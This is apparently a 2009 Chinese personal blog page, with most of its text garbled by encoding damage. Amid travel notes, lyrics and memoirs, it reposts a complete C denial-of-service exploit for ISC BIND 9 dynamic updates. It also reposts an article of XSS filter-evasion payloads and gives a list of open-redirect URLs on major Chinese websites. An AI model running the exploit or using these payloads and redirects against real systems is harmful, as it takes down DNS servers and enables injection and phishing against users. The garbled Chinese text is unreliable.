��

��ͼ��޵�

harite — 2009��10��28�� 11:47

��ͼƬ��Դ��Ϊ�Լ��Ĳ�Ӧ�ó����ϵ��ɾ��

Here We Go��

�Ǻ��ʯ��ǲݣ��ˡ��

��ĺ�̲��LOFT�͵ı��Ȼ��ǰ��һ�Զ�“�Ƿ��豸”

��3��ס�ŷǳ��“��а�”��1¥��һ��ɱ�˺ܲ��˵��͵��޴��ڰ��

�¸�ɱ��ҹ��~

�ճ��ƾ��Ƭ��޷��ֵģ��ɴ˿ɼ��һ��Ҫȫ�棡��ֻ��“֪��һҶ”��

��ͧ��ٶȿ��Ǻܿ�ģ��ܴ󣬲��ˬ��紵��ѡ�

��һɫ�ĸо��Ƕ��ڸ�ʲô�أ�

�п��ġ��

�в�ˮ�ġ��˳��˵һ�£�Զ��ǿ��ʯͷ��û˯��ȥһҹ��ǲ��

�д󺣱߳�˼�ġ��

��Ů��

��Ȼ��“͵��”��ǰ��ȸ�ں󡣱��߰��

��Զ��Ů��Ϊ“͵��”�ṩ֧�ֵġ�

��ŵ��һ��а��Ƶļһ��

��ޡ�

��ǲ��һ��ʶ��

ɳ̲��-��

��˹��

ͻȻ��Щ��һ��尸�ĸо��

��ǣ�

��ط��ǳ��зǳ�ˬ��ľ��۵ȶ��ǳ��ǳ��ʺ�һ��˻�һ��һ��档��Ǽ۸��Թ��Բ�ˬ��

==============================================================

��޵��

�й��׼�ӵ�кϷ��Ȩ��˽�˺��
��λ�ڹ㶫ʡ��嶫��й��һ�ҺϷ��˽�˺��Ҳ��й��׼Ұ�“��ʽ”��õĺ��ȼ�ʥ�أ��Ҫ��Ӫˮ��˶��жȼٺͷ��ز��ͬ��Ҳ�ǹ��ֺܾ͹��ʺ��ǱˮЭ��Ǳˮ�˶��ġ�
��Һ��˼��ɾ�
��Ϸֲ��Ө��׵�ɳ̲��һ��ε��ں��һ��Ȼʯ��԰��Լ22��꣬��½��ԼΪ16��꣬�ɴ�С��칹�ɣ��˳�ʱ��ɳ̲��ף�¥��֣��״��ʯ��Ȼ��Ȥ��·�˵�е��ɵ��԰��
“��ʽ”��ʩ
��Ϊ��ֺ��ò��“��ʽ”��¥��ʽ��¥��ɽ��ƴ��䣬ʹÿ��ÿ�׷��ܹۺ��Ϊ��ʵ�ĺ��ͷ��ʩ��ȫ��ʯ��ȡ��С��򳡡��ҡ��ҡ��๦�ܸ��ɳ̲�˶��ֶ��
��˶��
��ֲ��Ƴ�Ǳˮ�ᡢ�緫�ᡢ��ͧ�ᣬ�û�Ա�㲻��ż��Թ��Ŀǰ��ʱ�е��к��˶��⣬��ˮ�ϡ�ɳ̲��Ŀ�纣��㽶��ͧ��ɳ̲��ɵ��ڡ�ɳ̲�տ��ḻ��ˡ�
��ʽ��Ա�ƹ��ģʽ
��ֲ��ŷ��ʽ��Ա�ƹ��ṩרҵ��ʸ�Ʒζ�ķ��񣬷ǻ�Ա��ھ��ֲ�ÿ��Ļ�Ա�ƹ��ϵ��

�Ķ�ȫ��
���� 鿴��

�Ϻ�֮��--��һ��Ϻ�վ

harite — 2009��09��20�� 11:41

ȥ��Ϻ��Щ��£��Ҳ��ˣ��һ�ѡ�

��˵˵�Ϻ�֮��ң��Ϻ��ط��ʵҲ��٣��粻��µ�ʱ��ȥ��ˡ��һ��Ϻ��Ǵ��ڣ��ԣ��İ��Ҳ��Ϥ��

��˵��£�

1.մ��ϲ��Ĺ⡣

2.��Լ��ѧ��һЩ��ѡ�

3.��һЩ��״��飬��ο��

��Ϊʱ��̫�ϣ��ź��£�

1.û��ȥ��irisͬ�º�benjurry�ܡ�Ҳû��ȥ��ǰ��2��ĺø��ǣ��û��֪ͨ��Щ��ݣ�û�м��С��С��ǡ�

2.û��ȥ��ݣ��һЩ��Ҫ��¡�

3.û��֯һ��Ϻ�У�ѵľۻᣬ��˴��n��ѧУ�ѵ��档

4.19��Ͼ�·�ϵ��Ŵ��˼��û�кȵ��С��Ϳ�ɾƣ��ԺȾ��ĵ�һ�Σ��ܲ��

5.��и��뵽�Ĳ��뵽�ĸ��ź��Ĳ��ź��֡�

��ŭ��飺

1.��Ѹ��ϱ��ȥ��·�ϣ��ϱ��ͻȻ�ε��Ǹ�æ�ҳ�ȥҽԺ��Ǻü��Ϻ��⳵˾��Ȼ��ͣ��֮��ȣ�ȴ��̫̫��ˮ��Ұ�æȥ��һ�ߵıʼǱ��ȥ�ˣ��Ϻ�һЩ��⳵˾��ʻ��ô�ͣ�û��ԣ��ȣ��Ƕ��˰��ĳ��⳵˾��Ϻ��ʹ�پٰ�10��ڹ��ʶ��Ҳ��ֻ�Ƕ��С��Ҳͬ��ʣ��˹��˵�·��ܳ��ǿ��·��ܳ��ʵ��Ƕ��˰��Ҳ��Ҫ�ƾ��Ϻ��ͬ��˼��Ϻ��ֽ��ʱ��Ϻ��⳵˾��δ�ػ�ͣ��

2.�ɻ��ں󣬾��ú��΢�ۣ��Ѵ�绰��Ѿ��ȥҽԺ�ˣ��Է��xx��˻��⣬��˶��Եķ�ӳ��Һȵ��࣬��˷ɻ��Ͼ�˯��ˣ��ۺ��Ѿ��쵽�ˡ�ĿǰΪֹû�е��ɶ��ʣ��ƾ��ж��ķ�Ӧʱ��12~24��Сʱ�ڣ��ҵ�ע��ˡ��ǰ��˵xx��Ǵ�ƭ�ӣ��룬�Ϻ�ͬ��ҲҪ��Լ��˰��

�Ķ�ȫ��
���� 鿴��

2009��±�

harite — 2009��09��10�� 09:28

ϲ��Ŀ��Կ��Ƭ��ϲ��ͬ��Է��“http://user.qzone.qq.com/76167169/blog/1252585419”��档

�Ķ�ȫ��
���� 鿴��

XCON 2009 ��ȫ�� T��

harite — 2009��08��22�� 00:07

XCON 2009 ��ȫ�� T��

lake2��֪��һ��и��ܴ��һ�£�Ĥ��һ�£�ϴϴ˯�ˡ�

��ò�˵��Ҳ��и��֪��ɷ� exploit ��

�Ķ�ȫ��
����ȫ�� 鿴��

��һֱ��Ը��еĹ��͡��ſ��Ƶ��

harite — 2009��08��15�� 04:48

ż��ֺ��

��Ը
��֣��,��ӱ,��,�ƾ�

��:��
��:��

��ˮ��
��ǳ�
��һ��˵
ب�Ų��صȺ�
�ɳ��һ��Ҷ��
ͯ��һȺ�װ��
��һ��·��
�׺�ɣ��ӵ��
��Щ�Ұ��
��Щ��ŵķ�
��Щ��Զ��һ��һ��
��Щ��ҵ��
��Щ��
��Щ��Զ��һ��һ��
��Ƕ��й�һ��˵��
��ңԶ
��һ��һ��һ��
��Ƿ񻹻��ٳ��Ը
��Ƿ񻹻��ٳ��

��׸�Ĵ��߽��Ҳ��ݳ��֮һ��Ǹ��Ա��ӱ��£��鳪��Ǹ��ƾ��ĵ��ѧ��ҡ��

��MV�е��Ҳ��У��ժ¼��£�

��һֱ��Ը��еĹ��

��ֵ�һ�в��

��㱯��һЩ��㱯��

��ŭ��һ�в��ټ�ŭ��ʱ��

�ǲ��Ǻܿ��£�

һλ��˵��ͽ��

��㣬��֣��Ц��һ��

��ֻ�ܼ��“��˵�”

��һ��

Ҳֻ�ܼ��һ��“��”

��Щ�黳��ָ��

��˻��

�޹�ʹ��

��Щ�黳��

ʧȥ�Ժ��Զ�и��ʹ��˿��޷��ֲ�

�Ե�ʱ�� Ե�� һ��Ҹ�

�Ե�ʱ�� һ��

��ʱ�� һ�λ��

��ʱ�� Ե�� һ��̾Ϣ

��һֱ��Ը��еĹ��

��һ��

��Ҫ��ǣ��

��Ҫ��׷��

ʱ��

��鵭��

�మ��Ҳ��ľ�ɢ��

��Щ��һֱ��

��

��Ц��

��

��ÿ��ָ��

ȴ��Զ��䡣��

-------

��Ȼ�ǳ�Ů�ĸ��Ů��Ů��MV��

�Ķ�ȫ��
���� 鿴��

ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC(ת��)

harite — 2009��08��02�� 05:06

ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC

SSV ID:11948

SEBUG-Appdir:BIND

��ʱ��:2009-07-30

��Է��:

[www.sebug.net]
��վ�ṩ��(��)��ܴ��й��,��ȫ�о��ѧ֮��,��Ը�!

/*
    ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
    "Based on:
    http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt
    by kingcope - this is basically a rewrite of the above, lame i know, but fun enough
    
    for the [zone] argument you can try what is in the named.conf with "type master"
*/
 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
 
#define PORT 31337
 
struct dnspkt1 {
    unsigned short transact;
    unsigned short flags;
    unsigned short zones;
    unsigned short pr;
    unsigned short updates;
    unsigned short rrs;
};
 
struct dnspkt2 {
    unsigned short type;
    unsigned short class;
    unsigned short name2;
    unsigned short type2;
    unsigned short class2;
    unsigned short ttl1;
    unsigned short ttl2;
    unsigned short datalen;
    unsigned short name3;
    unsigned short type3;
    unsigned short class3;
    unsigned short ttl3;
    unsigned short ttl4;
    unsigned short datalen2;
};
 
int packdomain(char * dest, const char *src)
{
  int i,n,cnt;
 
  n=strlen(src);
  dest[n+1]=0;  // terminator
 
  cnt=0;
  for (i=n; i>0; i--)
  {
    if (src[i-1]=='.')
    {
      dest[i]=cnt;
      cnt=0;
    }
    else
    {
      dest[i]=src[i-1];
      cnt++;
    }
  }
  dest[0]=cnt;
  return n+2;
}
 
int main(int argc, char **argv) {
    int sockfd, clilen;
    struct sockaddr_in serv_addr, cli_addr;
    struct dnspkt1 d1;
    struct dnspkt2 d2;
 
    printf("ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\n");
    printf("Based on:\n");
    printf("http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\n");
    printf("by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\n");
 
    if (argc < 2) {
        printf("usage: %s  [zone]\n", argv[0]);
        return 0;
    }
 
        sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sockfd < 0) {
                printf("error on socket() call");
                return -1;
        }
 
        memset(&serv_addr, '\0', sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = INADDR_ANY;
        serv_addr.sin_port = htons(PORT);
 
        if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
                printf("error binding socket\n");
                return -1;
        }
    
        memset(&cli_addr, '\0', sizeof(cli_addr));
        cli_addr.sin_family = AF_INET;
        cli_addr.sin_addr.s_addr = inet_addr(argv[1]);
        cli_addr.sin_port = htons(53);
    
    memset(&d1, '\0', sizeof(d1));
    memset(&d2, '\0', sizeof(d2));
    d1.transact = htons(0x1cd6);
    d1.flags = htons(0x2800);
    d1.zones = htons(0x0001);
    d1.pr = htons(0x0001);
    d1.updates = htons(0x0001);
    d1.rrs = 0;
    char *name = (char*)malloc(8096);
    char nam[1024];
 
    if (argc < 3) {
        /* Not sure if this is right to set as default, have no clue about dns proto
           It works for me.. */
        strcpy(nam, "127.in-addr.arpa");
    } else {
        strncpy(nam, argv[2], sizeof(nam));
        nam[sizeof(nam)-1]=0;
    }
 
    int n=packdomain(name, (char*)nam);
    d2.type = htons(0x0006);
    d2.class = htons(0x0001);
    d2.name2 = htons(0xc00c);
    d2.type2 = htons(0x00ff);
    d2.class2 = htons(0x0001);
    d2.datalen = 0;
    d2.name3 = htons(0xc00c);
    d2.type3 = htons(0x00ff);
    d2.class3 = htons(0x00ff);
    d2.ttl1 = 0;
    d2.ttl2 = 0;
    d2.ttl3 = 0;
    d2.ttl4 = 0;
    d2.datalen2 = 0;
 
    char buffer[10000];
    memcpy(buffer, &d1, sizeof(d1));
    memcpy(buffer+sizeof(d1), name, n);
    memcpy(buffer+sizeof(d1)+n, &d2, sizeof(d2));
 
    clilen=sizeof(cli_addr);
    
    sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&cli_addr, sizeof(cli_addr));
    printf("aight!\n");
    return 0;
}

// sebug.net [2009-07-31]

from��http://www.sebug.net/exploit/11948/

Ӱ��汾��޸��飺http://www.sebug.net/vulndb/11919/

------

��BIND��©��

�Ķ�ȫ��
����ȫ�� 鿴��

��ҵһ��Ҿۻ�(4/6,��վ)

harite — 2009��07��15�� 11:22

��˵��ҵ��1��꣬��ѧʱ��ͬ��5��е�3��ʱ��ڣ��찡��ص㣺��ڡ�

��ϻ��ֱ��

��ˣ��һﻹ�ǲ��κ��ʺ�չ�ֳ��Լ��“��”��Ҳ��զ�ΰ��һ��͵��ȽϺá�

��һ˵ʲô��й�ɽկ֮��֮�飬һ��Ҫ��Ļ�ǿ��ҵ��תת��ȥС÷ɳ�ȼٴ�ˬһˬ��·�Ϲ��һ��硣

�ҿ��Ĵ��5555��Ѿ��Ĳ��ˡ�

��Ȼ4�˶��5�˴��˼��Ҳ��һ��黳��ͷ��ʩ��Ļ��ð�ա��е��Ļ��δ��°��ἰ��еĴ�ð�ռƻ��νYD+BT��һ��ޣ��Ǹ��

��ߵĲ��գ��ұߵ�ȷʵ��ҡ�� ƶ��Ǻ쾯2ĳ��bt�汾�лᷢ��Ǹ��ݳ�Ʒ��

��ݷ��û�д��ġ�

��һ��С��ǧ��޲��硣

��Ӻ��ձ��衣��Ѫ��ӡ�

��ʵ�һ��ǲ��ף�Ϊʲô��д“��”��

��Ȼ��֪��Ǽ��䲻��ģ��һ��ͨ��̩��ˮ��ϴ��ϴ�֡��

��ע�⣬��2ƿ��裬ֻ��Ϊ��е�һƿ�Ѿ��̫��ɹ��ˡ��ú�㶪��

��Ͻ��ֻ��Ҫ�еģ�

�Ķ�ȫ��
���� 鿴��

�Ҽ�¼��Щ��(ת��)

harite — 2009��06��19�� 11:43

��ʽ��ְ��1�꣬Ҳ��Ǳ�ҵ1��֮�ʣ��˴�ѧһ��Сѧ�ܵ��У��ԡ��Ҹ��һ��ҵģ��ԭ��ѧһ��ų�Ϊ�ҵ�ѧ�ܡ�

��Щ��ֻ��һ��˲��ס��Ը��Լ��ص��ѧʱ��˼��ʱ��

================================================================================

��Ũ��ľ��ڣ�
��ӵ��¶Ȼ��ڣ�
��ĸ��ڶ��ƣ�
��ŷ��ݵ��˻��ǰ��֣�
��Ҫ��¼�ģ�
��Щ��ֹ��޷��ȴ�Ļ��

��˵ģ��N��ʦ��۰ྴ��ʱ�ĺ��ţ��Ⱦ�ʱʪ��ۿ�
��˵ģ��ʦ�ͼƿ�3��ƿʱ�ĸ��ǣ��ʱ��Ӱ��ˬ��
��˵ģ��Ǽƿ�1ͯЬ��ǻ��޽��Ů��λõ��˫��ZHB��ʦ��汸�Ĵ�
��˵ģ��3LͯЬ��ĸ��ˣ��ź��ʦӵ��ʱ�İ��
��˵ģ��2ͯЬ��ĵ��ﱧͷʹ�޵Ĺ�â
��˵ģ��ôҲ��ӵ��Ĳ��ᣬ�Ȳ��ƣ��Ĳ��
��˵ģ��ÿһ��ͯЬ��޿�ЦЦ��ͣͣ��ھƾ��ˮ�м��Լ��ķҷ�

��ǵô�һ��ѧʱ��ɬ��ܵ�һ��ȥѧУԡ�ҵ��ʣ��һ��ݽ��Ľ��
��ǵ��ڴ��ºͿ��ֹ��ִ��һ��ģ�ı�׾��һ�ο��ʦ�ֳ��ʱ��Ľ��һ��ʦ�ִ��ʱ��
��ǵ�ѧ��ᣬ��һ�αർ��룬��һ�ε�̨��ݵ��ʦ��ҵ��æ
��ǵ��ǰΪ�˹��һ�Ƚ�ѧ��˶��ϸ��ƴ��ѵ��ĵ׼ᶨҪ��GB��
��ǵ��˺󣬰��ѧʱ��GBΪ��˵ʵ��ʱ��ִ�ŵ��

��ǵ��ʱ��ȫ��ͯЬ��е�ȭȭ��飬С�һ·��ϻ𳵵��·��ı˴�ʱ��
��ǵø�ѧ��6�˵�һ��ͨ��˷ܣ��Ҫ��Եľ�ǿ

��ǵô��4λŮ����淢��L��ʴ��࣬С��Ӽҵ��
��ǵ��17�ȵĶ��죬��LM��ˮ�ܵ�ȥ�԰��Ŀ��룬��꣬�޴�ȡů��
��ǵ��Ŀ��ۻ��̸Ц��Ԣ�սǾۻ�ĺ��죬��041��042��ɽ��
��ǵ��Ϳ��ȥ��һ·�ϵ��ܣ��˫�ɿޱܶ��̸��ų��С١дLԷʱ��鸴��ѵ�

��ǵô�һ��ҹ��Ŀ��ܣ��·��6��л��Ȥ�ǳ�
��ǵ��Ҳ��Ҫ��ë��ֳ��Ȱ��ݳ��˵ĸ�Ц�ǳ�
��ǵ�ѡɵB��ÿ�ֶ��һ��ɵB��һ�߹��
��ǵ��Ʈ�ݵ�ɵ��ľ��ˣ��ү��һ��̸Ƿ��100��ȣ��ҽԺ�Ŀֻ�
��ǵ�С��͵��ÿ��ͷ��¹��Զ��෨��̣�XXX�첻ϴ��ĻԻ�
��ǵ��һ��绰��ƭ�ľ��ﳵȥ��Ϊ��֤��Ԫ��ʴ�ĵķ��
��ǵô�һ��Ҳ�ͣŲ��ķ�ɧ��3�Ŵ��ŵ��
��ǵõ�һ��ڣ�С��ϼ�ţ��ζ��9��Ե��ʳ��Ĳ��
��ǵøտ�ʼ��̸��Щ�ƶ��ӣ��һ��װ13�糣
��ǵ��٣��ڸ��ɱ��Ϸ�Ŀ��ޱߣ��һ��ں��ļ��
��ǵ��Щ�ؼ��֣��ɱ��ǧ��ƣ��ӣ��޼��“��”��“��”��“12��֮ǰ��ֹ��ţ��”��“��и�”
��ǵ�ҹ��˯��Щ��֣�С��ĥ��ҹ��´��˵�λ��ͨ��ߺ��Ӣ�
��ǵ�99��ڶ��˳�Ե��Ǹ�HIGH��ӵ�Ϸ��ķ��ԱMM
��ǵ�“��ɢͼ�۱հ��ս”��GB��ɵ��~
��ǵý̻��DOTA��Ӵ��̤��˲��·��
��ǵ��ڹսǣ�ÿ��Ϩ�ƺ�˯��ǰ��Ҷ��һ��󣬴��֡��

��ǵ�ȥ��Ĵ��ɽ��ͨɱ��ҹ��Լ�û�μ��ϵķ��֮��
��ǵ�ȥ��ĸ��ɢ�ﷹ��۵��ʣ�޼��Ļӻ��ɢ��ǻ�֮��ȥ��

��ѡ�񣬵��겻��ô��Ϊ��ѵ��Ϊ�˽�ѧ��
��Է��Ҳֻ��Ϊ��պ��
��ã��Ͳ��٣��
��ط꣬��ǽ��ı��õ�֤��

��

�ҴӲ��ľ��
�Ӳ��05֮��
�Ӳ��ѡ��˴��ѧԺ��Ƭ��п��ʥ��
�Ӳ��ÿһ��㣬�ҵ��ǣ��ѧ5��һ·�߹��ĵ��ε�
�Դ˼�¼��ǵ��ʶ��֪��ϧ��⼴��ȴ��ļ��

�Ķ�ȫ��
���� 鿴��

JavaScript for hackers(ת��)

harite — 2009��06��16�� ڶ� �� 08:57

From http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/

========================================================================================

JavaScript for hackers

By garethheyes �� 22 Apr, 2009

Published in: xss, javascript, getter, filters, regex

Introduction

I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security.

So read on and enjoy my weird and wonderful JavaScript hacks.

RegExp replace can execute code

When using regular expressions with replace the second argument supports a function assignment. In Opera it seems you can use this argument to execute code. For example, check out the code snippet below:

'XSS'.replace(/XSS/g,alert)

This results in alert('XSS'); this works because the match from the RegExp is passed to the alert function as an argument. Normally you would use a function to perform another routine on the matched text, like so:

'somestring'.replace(/some/,function($1){//do something with some})

But as you can see in the first example in this section, instead of a user defined function we are executing a native alert call, and the arguments are passed to the native call from the regular expression. It's a cool trick and could be used to evade some XSS filters, for example if you inject a string then proceed with a dot you can then call any function you like.

To see how this is used in a XSS context, imagine we have an unfiltered " in the string in which an injection occurs, such as a JavaScript event or a script tag. First we inject our payload alert(1), then we break out of the quotes - " - and continue our regular expression:

.replace(/.+/,eval)//

Notice I use eval here to execute any code I like and the regular expression matches everything so that the full payload is passed to eval.

If I put all the code together and show you the output of the page it is easier to understand what is going on:

Page output:

The above code is common in analytics scripts where your search string is stored by an advertising company. You often don't see these scripts but if you view the source of a web page you'll find that they are a regular occurrence; forums are another place where they are prevalent. "YOUR INPUT" is the string you have control of; this is also referred to as DOM based XSS if the input isn't filtered correctly.

Input:

alert(1)".replace(/.+/,eval)//

Resulting output:

Notice the single line comment used to remove the trailing quote.

Unicode escapes

Although it's not possible to use parentheses when escaping unicode characters, you can escape the name of the function being called, for example:

\u0061\u006c\u0065\u0072\u0074(1)

This calls alert(1); \u indicates it's a unicode escape and the hex number after specifies the character. \u0061 is "a" and so on.

Mixing and matching unicode escapes is possible with normal characters; the example below demonstrates this:

\u0061lert(1)

You can also include them in strings and even evaluate them using eval. Unicode escapes are different to normal hex or octal escapes because they can be included in a string, or a reference to a function, variable or object.

The example below shows how to use unicode escapes that are evaluated and split into separate parts:

eval('\\u'+'0061'+'lert(1)')

By avoiding normal function names like alert, we can fool XSS filters into injecting our code. This very example was used to bypass PHPIDS (an open source IDS system), which resulted in the rules subsequently being made much stronger. If you are considering decoding JavaScript for malware analysis at runtime you need to consider the possible ways that multiple levels of encoding can work; as you can see from this example it won't be a easy task.

JavaScript parser engine

JavaScript is a very dynamic language. It can execute a surprising amount of code that at first glance doesn't look valid, however once you know how the parsers work, you begin to understand the logic behind it.

JavaScript doesn't know the result of a function until it is executed, and obviously it has to call the function to return the variable type. This leads to an interesting quirk - for example, if the returning function doesn't return a valid value for the code block, a syntax error will occur after the execution of the function.

What does this mean in English? Well, code speaks louder than words - check this example out

+alert(1)--

The alert function executes and returns undefined but by that time it is too late - the decrement operator is expecting a number and therefore raises an error.

Here's a few more valid examples that don't raise errors but are interesting nevertheless.

+alert(1)
1/alert(1)
alert(1)>>>/abc/

You might think the above examples are pointless but in fact they offer great insight into how Javascript works. Once you understand the small details the bigger picture becomes clear and the way that your code executes can help you understand how the parser works. I find these sort of examples useful when tracking down syntax errors and DOM based XSS, and exploiting XSS Filters.

Throw, Delete what?

You can use the delete operator in ways that you wouldn't at first expect, which results in some pretty wacky syntax. Lets see what happens if we combine the throw, delete, not and typeof operators?

throw delete~typeof~alert(1)

Even though you'd think it couldn't possibly work, it's possible to call delete on a function call and it still executes:

delete alert(1)

Here are a few more examples

delete~[a=alert]/delete a(1)
delete [a=alert],delete a(1)

At first glance you'd think that they would raise a syntax error but when examining the code further it sorta makes sense. The parser finds a variable assignment first within a array, performs the assignment and then deletes the array. Likewise the delete is performed after a function call because it needs to know the result of the function before it can delete the returned object, even if it is null.

Again these examples have been used to defeat XSS filters because they are often trying to match valid syntax and they don't expect the obscure nature of the code. You should consider such examples when programming your application data validation.

Global objects are statements

In certain instances of XSS filter evasion, it can be useful to send English-like text hidden within a vector. Clever systems like PHPIDS use English and vector comparisons to determine if a request is an attack or not, so it is a useful way to test these systems.

Using global objects/functions on their own can produce English-like code blocks. In fact, on the sla.ckers security forum we had a little game to produce English-like sentences in JavaScript. To get an idea of how it works, check out the following example:

stop, open, print && alert(1)

I coined the name Javascriptlish because it's possible to produce some crazy looking code:

javascript : /is/^{ a : ' weird ' }[' & wonderful ']/" language "
the_fun: ['never '] + stop['s']

We use the regular expression /is/ with the operator ^ and then create a object { a : 'weird'} (which has a property a and an assignment of weird.) Then we look for a property ' & wonderful ' within the object we just created, which is then divided by a string of language.

Next we use a label called the_fun and an array with never , use a global function called stop and check for a property of s ... all of which is valid syntax.

Getters/Setters fun

When Firefox added the custom syntax for setters it enabled some interesting XSS vectors that didn't use parentheses. Opera doesn't support a custom syntax yet - this is good from a security point of view but not from a JavaScript hacker's perspective.

Opera does however support the standard defineSetter syntax. This enables us to call functions via assignments, which still has some use for XSS filter evasion:

defineSetter('x',alert); x=1;

In case you're not aware of setters/getters, the example above creates a setter for the global variable x. A setter is called whenever a variable is set with something and the argument is supplied from whatever has been assigned. The second argument is the function to be called on assignment, which is alert. Then, when x is assigned the value of 1, the alert function is called with 1 as the argument.

Location allows url encoding

The location object allows url encoding within the JavaScript code. This allows you to further obfuscate XSS vectors by double encoding them.

location='javascript:%61%6c%65%72%74%28%31%29'

Combining them with unicode escapes can hide strings quite nicely:

location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)'

The first example works because the URL bar in Opera accepts urlencoded strings - you can hide JavaScript syntax by url encoding it. This is useful because when it is passed within a XSS vector you can double url encode it to help further with filter evasion.

The second example combines the first technique with the unicode escape technique mentioned previously. So when you decode the string it results in the unicode representation of alert which is \u0061\u006c\u0065\u0072\u0074.

Hackvertor: Your second brain

As a JavaScript hacker I couldn't possibly remember every single encoding method that's possible with JavaScript, so I decided to create a open source tool to do the hard work for me. In the last example the string is double encoded, which can sometimes make it hard to understand. Using my Hackvertor tool makes it a piece of cake and it works nicely in Opera too.

Hackvertor works by using tags to perform multiple levels of conversion; this is similar to HTML tags but it runs code instead of changing the display of the containing text. It converts from the innermost tag outwards, eg to convert the last vector it url decodes and then decodes the unicode escapes, which results in javascript:alert(1).

�Ķ�ȫ��
����ȫ�� 鿴��

��

harite — 2009��05��12�� ڶ� �� 11:03

��˵��1��2���ܸо�˯��ǳ��á��о��˯��ʱ��ʹ��11��ϴ�˯��ˣ��һ��Ǽ��û˯�ţ��뷴��ķ��Ȼ��;�ʹ��̫��ˣ�ʵ�ڿ��ס�ˡ��ȥҽԺ��˼�飬��ͻ�ס��ȡ��˵�е�“��첡”��Ҿ��ˣ��Ҳ��“��”��Ҳ��ⲡ��555555

��ܶ��ҵ��һ�ߵ�ͬ��Ǵ��һ�¸��ܣ�ƽʱһ��Ҫע��ر��ǳ��칫�ҵĸ�λ��һ��Ҫ“�ɾ��ɾ�վ”��١��Ȼ��ǰ��ж�ã��һ��޴��ҽ��Ļ�“��”��ң��֪��ҵĻ��û��“��”��أ�

�Ķ�ȫ��
���� 鿴��

��վ��CGI��ת©��

harite — 2009��04��17�� 10:12

PS:��Щ��շѹ��ӣ��ǾͲ�˵ɶ�ˣ��ú�׬Ǯ�ɡ�

��Ѷ��ת
http://wizard.stock.hexun.com/other/tj.aspx?p=135&url=http://hi.baidu.com/harite

51ͳ��ת
http://tj.51.com/?formType=3201&go=1&url=http://hi.baidu.com/harite

sohu��ת
http://doc.go.sohu.com/200803/eabe8074ec19493e28518d97dcffc66d.php?url=http://hi.baidu.com/harite

http://adc.go.sohu.com/200701/eaf743c3305b93fb4b50889ed398f0fc.php?url=http://hi.baidu.com/harite

mop��ҳ��frame
http://tt.mop.com/main.jsp?url=http://hi.baidu.com/harite

��163��վ��ת
http://%70ro.163.com/\/\event.ng/Type=&Redirect=http://hi.baidu.com/harite

ChinaZͳ��ϵͳ��վ��ת(302Э��ת)
http://alexa.chinaz.com/redirect.asp?id=url=httep://bsog.cn/index.asp=&url=hi.baidu.com/harite

�ſ��ת
http://hz.youku.com/red/click.php?tp=1&cp=2009185&cpp=1000093&url=http://hi.baidu.com/harite

��в��֮��ĺܶ࣬��Ӱ��ϡ�

��֪ͨ��ָ�л�� :-)

�Ķ�ȫ��
����ȫ�� 鿴��

ֵ����ʮ��Ů��(ת��)

harite — 2009��04��05�� 08:26

ֵ����ʮ��Ů��

1.��㣬��ʹ��ϣ�һ�仰��˵��㿪�ĵ�ʱ��߿��΢Ц��ӡ��ʧ��ʱ��һʱ��Ա߰�ο�㣬��Դ��㡣�㰾ҹ��QQ��msn��һ��š��ˣ��ٵ�¼һ��ͷ��Ͱ��ˡ��֪��ô��ֻ��ڵ��㡣

2.��£�֪��ʲôʱ��ʲôʱ��С��һ��ϧ�㡣��Ǹ�ѧ��Ե�Ҫ��̿��֣��û�о��Դ��ݳ�Ʒ��Ѿ��Թ��Ǵ�绰��㹤��ĵ�ʱ��Ҫ����ʹ�Լ��ٲ��ã�Ҳ��ӵ��㣬ʼ��վ��ߡ�

3.��Ź��κ��йص��Ϣ��Ȧ��Ȧ��ʶ��ѣ��κ��ռ��Ե��ѵ�ҳ�棬��ϲ��ĵ�Ӱ��飬ȥ��ϲ��Ĳ��ϲ��Ʒ�Ƶ꣬��׾��ģ��͵��͡��ǲ��ã��ø��ã��ʺ��㣬��׵õ��Ͽɺ��

4.��ͬ��ͬѧ��ǰ��ȱ�㣬��Ц�㣬��ֻ��Ц��ܾ��ô��ԣ��Ҫ��ӣ��Բ��̨��£�ֻɹ�Ҹ��ֻ˵��ĺá�

5.��Ҫ��ļ�򣬵��Ǿ��ᷲ�¶��㡣��ǰ��ƣ��Ҫ��ѳ־��档��ֻ��ϲ��ǰװɵ��ϲ��չˡ��ճ��㣬��㵱��ķ��ö��ʱ��һ��ˡ�

6.��Ҫ��ò��Ҫ��ð��ݺ�Ǩ�ͣ��Ϊ��Ů�ˣ��Ϊ��ˡ��˱��軵��ͷ��β��Ǹ��ǻ��С��ظ��ԭ�¡�

7.��Ķ��ż��д��֣��塣��ע�ظ��һ��ʱ��һ��ϸ�ڣ��Ϣ֮ǰ��ᷴ��ȷ�Ϻü��飬��ʣ��顣

8.��һ��ۻ�ʱ��Ư��ޣ�ֻ��ǰż��ܻ��·��Զ��Դ��ǿ�ȸ��չʾ��

9.��Ů��Χ��ת��Դף��ЩŮ�˺��㣬��׳Դף��ǲ��ȡ�֣��ʦ����㣬�ں��㣬��Ҫץס�㡣ֻҪ��ģ��Ҫ��ϧ��ĵĻ��Ҫ��ֻ��һ��ֻ��Ļ��

10.��Ҳ��кܶ��ѣ�Ҳ��׷��ߣ��ȷ��ϲ��㣬��Ҳ��Щ�˵��ŵ��Ƚϡ��ʱ��ʱ��˭˭˭Ҫ׷��ŵı��飬��ؼ�һ�䣬��ֻ��һ��o(��_��)o��ģ��Ҫ��ӡ�

